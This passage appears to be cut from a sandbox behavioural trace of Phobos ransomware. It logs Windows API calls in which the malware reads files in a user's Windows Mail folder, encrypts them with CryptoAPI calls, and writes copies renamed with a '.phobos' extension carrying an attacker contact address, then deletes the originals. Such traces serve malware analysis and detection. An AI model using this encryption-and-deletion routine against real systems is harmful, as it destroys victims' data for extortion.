lpBuffer=0x357014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2f4fc54, lpOverlapped=0x0 | out: lpBuffer=0x357014a*, lpNumberOfBytesWritten=0x2f4fc54*=0x40000, lpOverlapped=0x0) returned 1 [0189.060] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xaaaaa, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc48 | out: lpNewFilePointer=0x0) returned 1 [0189.060] WriteFile (in: hFile=0x124, lpBuffer=0x357014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2f4fc54, lpOverlapped=0x0 | out: lpBuffer=0x357014a*, lpNumberOfBytesWritten=0x2f4fc54*=0x40000, lpOverlapped=0x0) returned 1 [0189.061] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc48 | out: lpNewFilePointer=0x0) returned 1 [0189.061] WriteFile (in: hFile=0x124, lpBuffer=0x357014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2f4fc54, lpOverlapped=0x0 | out: lpBuffer=0x357014a*, lpNumberOfBytesWritten=0x2f4fc54*=0x40000, lpOverlapped=0x0) returned 1 [0189.067] CloseHandle (hObject=0x124) returned 1 [0189.067] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0189.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb00001.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0189.068] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2097152) returned 1 [0189.068] CloseHandle (hObject=0x124) returned 1 [0189.068] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb00001.log")) returned 0x2020 [0189.068] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb00001.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb00001.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0189.069] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb00001.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0189.069] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0189.069] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0189.070] ReadFile (in: hFile=0x124, lpBuffer=0x34b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2f4fc4c, lpOverlapped=0x0 | out: lpBuffer=0x34b0058*, lpNumberOfBytesRead=0x2f4fc4c*=0x40000, lpOverlapped=0x0) returned 1 [0189.097] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xaaaaa, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0189.097] ReadFile (in: hFile=0x124, lpBuffer=0x34f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2f4fc4c, lpOverlapped=0x0 | out: lpBuffer=0x34f0058*, lpNumberOfBytesRead=0x2f4fc4c*=0x40000, lpOverlapped=0x0) returned 1 [0189.144] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x1c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0189.144] ReadFile (in: hFile=0x124, lpBuffer=0x3530058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2f4fc4c, lpOverlapped=0x0 | out: lpBuffer=0x3530058*, lpNumberOfBytesRead=0x2f4fc4c*=0x40000, lpOverlapped=0x0) returned 1 [0189.164] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc30, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc9c | out: phKey=0x2f4fc9c*=0xa32d28) returned 1 [0189.164] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0189.164] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc50*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc50*=0xc0060) returned 1 [0189.171] CryptDestroyKey (hKey=0xa32d28) returned 1 [0189.171] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc78 | out: lpNewFilePointer=0x0) returned 1 [0189.172] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2f4fc88, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc88*=0xc0112, lpOverlapped=0x0) returned 1 [0189.269] SetEndOfFile (hFile=0x124) returned 1 [0189.269] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x1c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc48 | out: lpNewFilePointer=0x0) returned 1 [0189.269] WriteFile (in: hFile=0x124, lpBuffer=0x357014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2f4fc54, lpOverlapped=0x0 | out: lpBuffer=0x357014a*, lpNumberOfBytesWritten=0x2f4fc54*=0x40000, lpOverlapped=0x0) returned 1 [0189.270] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xaaaaa, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc48 | out: lpNewFilePointer=0x0) returned 1 [0189.270] WriteFile (in: hFile=0x124, lpBuffer=0x357014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2f4fc54, lpOverlapped=0x0 | out: lpBuffer=0x357014a*, lpNumberOfBytesWritten=0x2f4fc54*=0x40000, lpOverlapped=0x0) returned 1 [0189.272] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc48 | out: lpNewFilePointer=0x0) returned 1 [0189.272] WriteFile (in: hFile=0x124, lpBuffer=0x357014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2f4fc54, lpOverlapped=0x0 | out: lpBuffer=0x357014a*, lpNumberOfBytesWritten=0x2f4fc54*=0x40000, lpOverlapped=0x0) returned 1 [0189.273] CloseHandle (hObject=0x124) returned 1 [0189.275] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0189.275] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0189.282] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=255) returned 1 [0189.282] CloseHandle (hObject=0x124) returned 1 [0189.282] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm")) returned 0x2020 [0189.282] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0189.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0189.283] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0189.283] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0189.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0189.283] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0189.283] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0189.283] ReadFile (in: hFile=0x124, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xff, lpOverlapped=0x0) returned 1 [0189.284] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100, dwBufLen=0x100 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100) returned 1 [0189.284] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x100, lpOverlapped=0x0) returned 1 [0189.285] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0189.285] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0189.285] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0189.285] CryptDestroyKey (hKey=0xa327e8) returned 1 [0189.285] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0189.285] CryptDestroyKey (hKey=0xa32d28) returned 1 [0189.285] CloseHandle (hObject=0x124) returned 1 [0189.285] CloseHandle (hObject=0x178) returned 1 [0189.285] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm")) returned 1 [0189.286] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0189.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0189.287] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=645) returned 1 [0189.287] CloseHandle (hObject=0x178) returned 1 [0189.287] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini")) returned 0x2026 [0189.287] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0189.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0189.287] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0189.287] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0189.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0189.288] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0189.288] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0189.288] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x285, lpOverlapped=0x0) returned 1 [0189.289] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x290, dwBufLen=0x290 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x290) returned 1 [0189.289] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x290, lpOverlapped=0x0) returned 1 [0189.289] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0189.289] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0189.289] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0189.290] CryptDestroyKey (hKey=0xa327e8) returned 1 [0189.290] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0189.290] CryptDestroyKey (hKey=0xa32d28) returned 1 [0189.290] CloseHandle (hObject=0x178) returned 1 [0189.290] CloseHandle (hObject=0x124) returned 1 [0189.290] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini")) returned 1 [0189.291] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0189.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0189.291] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=231) returned 1 [0189.291] CloseHandle (hObject=0x124) returned 1 [0189.291] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm")) returned 0x2020 [0189.291] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0189.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0189.292] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0189.292] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0189.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0189.587] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c28) returned 1 [0189.587] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0189.587] ReadFile (in: hFile=0x124, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xe7, lpOverlapped=0x0) returned 1 [0189.642] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0189.642] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0189.643] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0189.643] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0189.643] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0189.643] CryptDestroyKey (hKey=0xa32c68) returned 1 [0189.643] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0189.644] CryptDestroyKey (hKey=0xa32c28) returned 1 [0189.644] CloseHandle (hObject=0x124) returned 1 [0189.644] CloseHandle (hObject=0x154) returned 1 [0189.644] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm")) returned 1 [0189.823] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0189.823] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0189.824] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=237) returned 1 [0189.825] CloseHandle (hObject=0x178) returned 1 [0189.826] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm")) returned 0x2020 [0189.826] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0189.826] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0189.826] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0189.826] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0189.826] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0189.827] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0189.827] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0189.827] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xed, lpOverlapped=0x0) returned 1 [0190.022] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0190.022] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, 